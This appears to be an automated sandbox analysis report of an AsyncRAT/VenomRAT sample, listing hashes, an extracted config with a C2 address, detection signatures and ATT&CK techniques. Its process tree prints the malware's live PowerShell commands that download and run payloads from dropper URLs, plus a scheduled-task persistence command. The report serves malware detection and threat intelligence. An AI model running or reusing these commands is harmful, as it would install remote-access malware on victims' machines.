asyncrat | c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660

General

Target

c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
Size

74KB
MD5

9f7b2bf836c0e9682f7f612fc60d88f9
SHA1

2a99db9697d168488ef962ff51f0599e89bfeaeb
SHA256

c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660
SHA512

59f899ed095371cf13e63ee9748bc8cdc86aa1b2ede5d068dc81f6b0134219fd8f31bfd3f664602cf8562ab4851acdf85f5a06de35ab6f949106139a1ff37556
SSDEEP

1536:i9ZAUZ2HXtkAmLej8CGqPM63JCdNhnY+YH1bo/yUaV4zQX3VclN:i9KUZ82AmLeYoPM63JCnYH1bo9Y4elY

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu.exgaming.click

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

94.156.65.172:4449

Mutex

izslwuidilziewad

Attributes

delay
1
install
true
install_file
AntiMalware.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

VenomRAT 3 IoCs

Detects VenomRAT.

rat

Processes:

resource	yara_rule
behavioral1/memory/484-1-0x0000000000180000-0x0000000000196000-memory.dmp	VenomRAT
\Users\Admin\AppData\Roaming\AntiMalware.exe	VenomRAT
behavioral1/memory/2572-31-0x00000000004A0000-0x00000000004B6000-memory.dmp	VenomRAT

Executes dropped EXE 1 IoCs

Processes:

AntiMalware.exe

pid process

2572 AntiMalware.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2784 cmd.exe

pid	process
2572	AntiMalware.exe

pid	process
2784	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1792	powershell.exe
2812	powershell.exe
2212	powershell.exe
112	powershell.exe
1776	powershell.exe
1768	powershell.exe
2836	powershell.exe
2188	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2804 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2712 schtasks.exe

pid	process
2804	timeout.exe

pid	process
2712	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exec8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exepowershell.exepowershell.exeAntiMalware.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1792	powershell.exe
484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
2812	powershell.exe
2212	powershell.exe
2572	AntiMalware.exe
2572	AntiMalware.exe
1776	powershell.exe
1768	powershell.exe
112	powershell.exe
2836	powershell.exe
2188	powershell.exe
2572	AntiMalware.exe
2572	AntiMalware.exe
2572	AntiMalware.exe
2572	AntiMalware.exe
2572	AntiMalware.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exepowershell.exepowershell.exeAntiMalware.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2572	AntiMalware.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

AntiMalware.exe

pid process

2572 AntiMalware.exe

pid	process
2572	AntiMalware.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.execmd.execmd.execmd.exeAntiMalware.execmd.exe

description	pid	process	target process
PID 484 wrote to memory of 2072	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 2072	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 2072	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 2072 wrote to memory of 1792	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1792	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1792	2072	cmd.exe	powershell.exe
PID 484 wrote to memory of 1872	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 1872	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 1872	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 2784	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 2784	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 484 wrote to memory of 2784	484	c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe	cmd.exe
PID 1872 wrote to memory of 2712	1872	cmd.exe	schtasks.exe
PID 1872 wrote to memory of 2712	1872	cmd.exe	schtasks.exe
PID 1872 wrote to memory of 2712	1872	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 2804	2784	cmd.exe	timeout.exe
PID 2784 wrote to memory of 2804	2784	cmd.exe	timeout.exe
PID 2784 wrote to memory of 2804	2784	cmd.exe	timeout.exe
PID 2072 wrote to memory of 2812	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 2812	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 2812	2072	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2572	2784	cmd.exe	AntiMalware.exe
PID 2784 wrote to memory of 2572	2784	cmd.exe	AntiMalware.exe
PID 2784 wrote to memory of 2572	2784	cmd.exe	AntiMalware.exe
PID 2572 wrote to memory of 3064	2572	AntiMalware.exe	cmd.exe
PID 2572 wrote to memory of 3064	2572	AntiMalware.exe	cmd.exe
PID 2572 wrote to memory of 3064	2572	AntiMalware.exe	cmd.exe
PID 3064 wrote to memory of 2212	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2212	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2212	3064	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1776	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1776	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1776	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1768	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1768	2072	cmd.exe	powershell.exe
PID 2072 wrote to memory of 1768	2072	cmd.exe	powershell.exe
PID 3064 wrote to memory of 112	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 112	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 112	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2836	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2836	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2836	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2188	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2188	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2188	3064	cmd.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
"C:\Users\Admin\AppData\Local\Temp\c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:484
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\Admin\AppData\Roaming\AntiMalware.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\Admin\AppData\Roaming\AntiMalware.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2712
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpEE93.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2804
- - C:\Users\Admin\AppData\Roaming\AntiMalware.exe
    "C:\Users\Admin\AppData\Roaming\AntiMalware.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3064
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpEE93.tmp.bat

Filesize
155B

MD5
8adc16cdccced9a06a345695e223921b

SHA1
5b3140c5e1048ef0e3ed499e9d539f5f6d047ac2

SHA256
3a9d1bf68d3f73d0a7540aa76b4a4d2c30f5eb5633a13f04d9402df78c6c0907

SHA512
2d3b87db542f09c020451870fbf2240aae0849eaee37892e3b1d81e49fb3f3eb63af297a621b006203b1b5338ff24d6b44550d61fa4170d4ced46300b5e149f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2aff5aa81759c234b13d1c02f9d4174a

SHA1
83374ec170d48858576349cf16bd7e4c426506ea

SHA256
53fe75c643a3780dda9c9316948fdcdcc9f2c38532f8ef630120569668c5282e

SHA512
4b1de1bcc8229c78be1fd79e416b730ec94391bb5012b3f2e37b30af04549fd624f12980d3fc1b220597fd06da2fb5abcccab06feaad149f39828f508ec25a51

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V3D7KHZY8CMOTEZRMCPP.temp

Filesize
7KB

MD5
4911bd6fa19dd86c6fe15f82e97e5f29

SHA1
7214925cf7a58cb400856b38afa5844c19ae37e3

SHA256
82232088921d92b80e1738eed67ec11d37431664d34af553871c35f52bac6923

SHA512
1af9577b432937eb743b7d6532655686cb7cc07b9cb55c99098915b1ae61b6c9fefbb5b44ebca2095ae2417d7fcbf9b664b9678b5c86a233d96e1ca2209fc250

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\AntiMalware.exe

Filesize
74KB

MD5
9f7b2bf836c0e9682f7f612fc60d88f9

SHA1
2a99db9697d168488ef962ff51f0599e89bfeaeb

SHA256
c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660

SHA512
59f899ed095371cf13e63ee9748bc8cdc86aa1b2ede5d068dc81f6b0134219fd8f31bfd3f664602cf8562ab4851acdf85f5a06de35ab6f949106139a1ff37556

Download Submit
memory/484-1-0x0000000000180000-0x0000000000196000-memory.dmp

Filesize
88KB

Download
memory/484-0-0x000007FEF5C33000-0x000007FEF5C34000-memory.dmp

Filesize
4KB

Download
memory/484-9-0x000007FEF5C30000-0x000007FEF661C000-memory.dmp

Filesize
9.9MB

Download
memory/484-19-0x000007FEF5C30000-0x000007FEF661C000-memory.dmp

Filesize
9.9MB

Download
memory/1792-8-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/1792-7-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/2572-31-0x00000000004A0000-0x00000000004B6000-memory.dmp

Filesize
88KB

Download
memory/2812-26-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2812-25-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads